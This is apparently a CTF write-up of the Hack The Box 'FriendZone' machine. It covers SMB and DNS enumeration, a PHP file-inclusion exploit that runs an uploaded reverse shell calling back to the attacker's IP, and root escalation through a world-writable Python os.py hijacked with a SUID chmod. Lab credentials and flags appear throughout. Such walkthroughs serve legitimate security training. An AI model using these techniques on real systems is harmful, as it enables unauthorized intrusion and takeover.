FriendZone

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.123 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Mon Sep  5 13:43:56 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.123
Nmap scan report for 10.10.10.123
Host is up (0.044s latency).
Not shown: 65528 closed tcp ports (reset)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds

# Nmap done at Mon Sep  5 13:44:09 2022 -- 1 IP address (1 host up) scanned in 13.60 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p21,22,53,80,139,443,445 10.10.10.123 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Mon Sep  5 13:45:45 2022 as: nmap -sCV -p21,22,53,80,139,443,445 -oN targeted 10.10.10.123
Nmap scan report for 10.10.10.123
Host is up (0.041s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_http-title: 404 Not Found
|_http-server-header: Apache/2.4.29 (Ubuntu)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -59m59s, deviation: 1h43m54s, median: 0s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-09-05T11:46:00
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2022-09-05T14:46:00+03:00
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep  5 13:46:09 2022 -- 1 IP address (1 host up) scanned in 24.41 seconds

Let's start enumerating the SMB server with smbmap.

smbmap -H 10.10.10.123

-H IP address of host.

[+] Guest session       IP: 10.10.10.123:445    Name: friendzone.red                                    
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        Files                                                   NO ACCESS       FriendZone Samba Server Files /etc/Files
        general                                                 READ ONLY       FriendZone Samba Server Files
        Development                                             READ, WRITE     FriendZone Samba Server Files
        IPC$                                                    NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))

The guest user is able to read the general share and write and read in the Development share. Note the comment on the Files share saying that it is located in /etc/files. We could guess that the other two shares are located in /etc/general and /etc/Development. The Development share is empty.

smbclient //10.10.10.123/Development

Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Sep  5 18:16:54 2022
  ..                                  D        0  Wed Jan 23 22:51:02 2019

                9221460 blocks of size 1024. 6459548 blocks available

But the general share contains one file called creds.txt.

smbclient //10.10.10.123/general

Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 16 21:10:51 2019
  ..                                  D        0  Wed Jan 23 22:51:02 2019
  creds.txt                           N       57  Wed Oct 10 01:52:42 2018

                9221460 blocks of size 1024. 6459548 blocks available

Let's transfer it to our local machine, and open it.

smb: > get creds.txt

creds for the admin THING:

admin:WORKWORKHhallelujah@#

The file contains some credentials, but we don't know for what yet. If we take a look at the HTTP website on port 80, we'll see just an image and an email with the friendzoneportal.red domain.

Let's add that domain name and the one which nmap reported to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.123    friendzone.red    friendzoneportal.red

Now, let's check if there is any virtual hosting going on.

Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server.

If we check the following URL, we'll see another different website.

https://friendzone.red/

And in using the friendzoneportal.red domain name, we'll see another one.

https://friendzoneportal.red/

As port 53 (DNS) is open on the machine, we can try to do a transfer zone attack and list all possible subdomains for the friendzone.red domain name.

dig @10.10.10.123 friendzone.red axfr

; <<>> DiG 9.18.4-2-Debian <<>> @10.10.10.123 friendzone.red axfr
; (1 server found)
;; global options: +cmd
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.         604800  IN      AAAA    ::1
friendzone.red.         604800  IN      NS      localhost.
friendzone.red.         604800  IN      A       127.0.0.1
administrator1.friendzone.red. 604800 IN A      127.0.0.1
hr.friendzone.red.      604800  IN      A       127.0.0.1
uploads.friendzone.red. 604800  IN      A       127.0.0.1
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Mon Sep 05 18:32:37 CEST 2022
;; XFR size: 8 records (messages 1, bytes 289)

And the friendzoneportal.red domain name.

dig @10.10.10.123 friendzoneportal.red axfr

; <<>> DiG 9.18.4-2-Debian <<>> @10.10.10.123 friendzoneportal.red axfr
; (1 server found)
;; global options: +cmd
friendzoneportal.red.   604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.   604800  IN      AAAA    ::1
friendzoneportal.red.   604800  IN      NS      localhost.
friendzoneportal.red.   604800  IN      A       127.0.0.1
admin.friendzoneportal.red. 604800 IN   A       127.0.0.1
files.friendzoneportal.red. 604800 IN   A       127.0.0.1
imports.friendzoneportal.red. 604800 IN A       127.0.0.1
vpn.friendzoneportal.red. 604800 IN     A       127.0.0.1
friendzoneportal.red.   604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Mon Sep 05 18:34:23 CEST 2022
;; XFR size: 9 records (messages 1, bytes 309)

Let's add all these new subdomains to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.123    friendzone.red friendzoneportal.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red admin.friendzoneportal.red files.friendzoneportal.red imports.friendzoneportal.red vpn.friendzoneportal.red

Exploitation

In the administrator1.friendzone.red HTTPS server, there is a login page, where the credentials that we have might work.

https://administrator1.friendzone.red/

It looks like the credentials are valid.

Let's go to the /dashboard.php page.

https://administrator1.friendzone.red/dashboard.php

Let's do what is says and add the GET parameters with those values.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

If we try to change the pagename parameter, we'll get an error saying that the include function failed.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=test

If we try to put dashboard it will load the page we are currently in.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=dashboard

This happens probably because the PHP script is adding the .php extension to the value of the pagename parameter. One thing we could do is upload a PHP file, which will send us a reverse shell, to the Development share, supposedly located in /etc/Development, and access it through this exploit. I will be using the /usr/share/webshells/php/php-reverse-shell.php reverse shell.

cp /usr/share/webshells/php/php-reverse-shell.php .
nano /usr/share/webshells/php/php-reverse-shell.php

$ip = '10.10.14.11';  // CHANGE THIS
$port = 4444;       // CHANGE THIS

Then upload the shell to the Development share.

smbclient //10.10.10.123/Development

Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> put php-reverse-shell.php 
putting file php-reverse-shell.php as \php-reverse-shell.php (44.3 kb/s) (average 44.3 kb/s)

Set a netcat listener on port 4444.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

Finally, if we put /etc/Development/php-reverse-shell.php, we should get a shell as the www-data user. Then, we'll be able to grab the user flag.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell

listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.123] 40512
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 19:55:36 up 53 min,  0 users,  load average: 0.01, 0.13, 0.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/friend/user.txt
a9ed20acecd6c5b6b52f474e15ae9a11

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg
reset
Terminal type? xterm

Next, I export a few variables:

export TERM=xterm
export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

Let's check the system users.

grep sh /etc/passwd

root:x:0:0:root:/root:/bin/bash
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin

There is only one user called friend. If we inspect the /var/www directory, we'll find the mysql_data.conf file which contains the password for the friend user.

cat /var/www/mysql_data.conf

for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

db_name=FZ

Let's become the friend user.

su friend

Password: Agpyu12!0.213$
friend@FriendZone:/$ whoami
friend
friend@FriendZone:/$ id
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)

At this point, I tried to look for scheduled tasks on the system with the pspy tool. Let's transfer pspy to the friendzone machine.

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

https://github.com/DominicBreuker/pspy

python -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

On the time machine, go to the /tmp directory, download the binary, and give it execution permissions.

cd /tmp
wget http://10.10.14.11:8000/pspy64
chmod +x pspy64

If we execute the tool, we'll see at some point that the root user, with the UID set to 0, is executing the /opt/server_admin/reporter.py script.

./pspy64

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░                                                                                                   
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒                                                                                                    
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░                                                                                                    
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░                                                                                                     
                   ░           ░ ░                                                                                                        
                               ░ ░                                                                                                        
                                                                                                                                          
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)                                         
Draining file system events due to startup...                                                                                             
done
2022/09/05 20:08:01 CMD: UID=0    PID=1787   | /bin/sh -c /opt/server_admin/reporter.py 
2022/09/05 20:08:01 CMD: UID=0    PID=1786   | /usr/sbin/CRON -f

This script is just importing the os library and printing a message with a few variables.

cat /opt/server_admin/reporter.py

#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

The thing is that if we search for the os.py script, and look its permissions, we'll see that everyone can write on it.

find / -name os.py 2>/dev/null | xargs ls -l

-rwxrwxrwx 1 root root 25910 Jan 15  2019 /usr/lib/python2.7/os.py
-rw-r--r-- 1 root root 37526 Sep 12  2018 /usr/lib/python3.6/os.py

Now we can modify the script so when root executes it, it will give the /bin/bash binary the SUID permission. Add the following code at the end of the /usr/lib/python2.7/os.py script.

nano /usr/lib/python2.7/os.py

system("chmod u+s /bin/bash")

If we wait for a few minutes, we should see the bash binary with SUID permissions.

ls -l /bin/bash

-rwsr-xr-x 1 root root 1113504 Apr  4  2018 /bin/bash

Now, all we have to do is execute bash with root permissions, reap the harvest and take the root flag.

bash -p

bash-4.4# whoami
root
bash-4.4# cat /root/root.txt 
b0e6c60b82cf96e9855ac1656a9e90c7

Last updated 2 years ago

Was this helpful?

hashtagEnumeration

hashtagExploitation

hashtagPrivilege Escalation

Enumeration

Exploitation

Privilege Escalation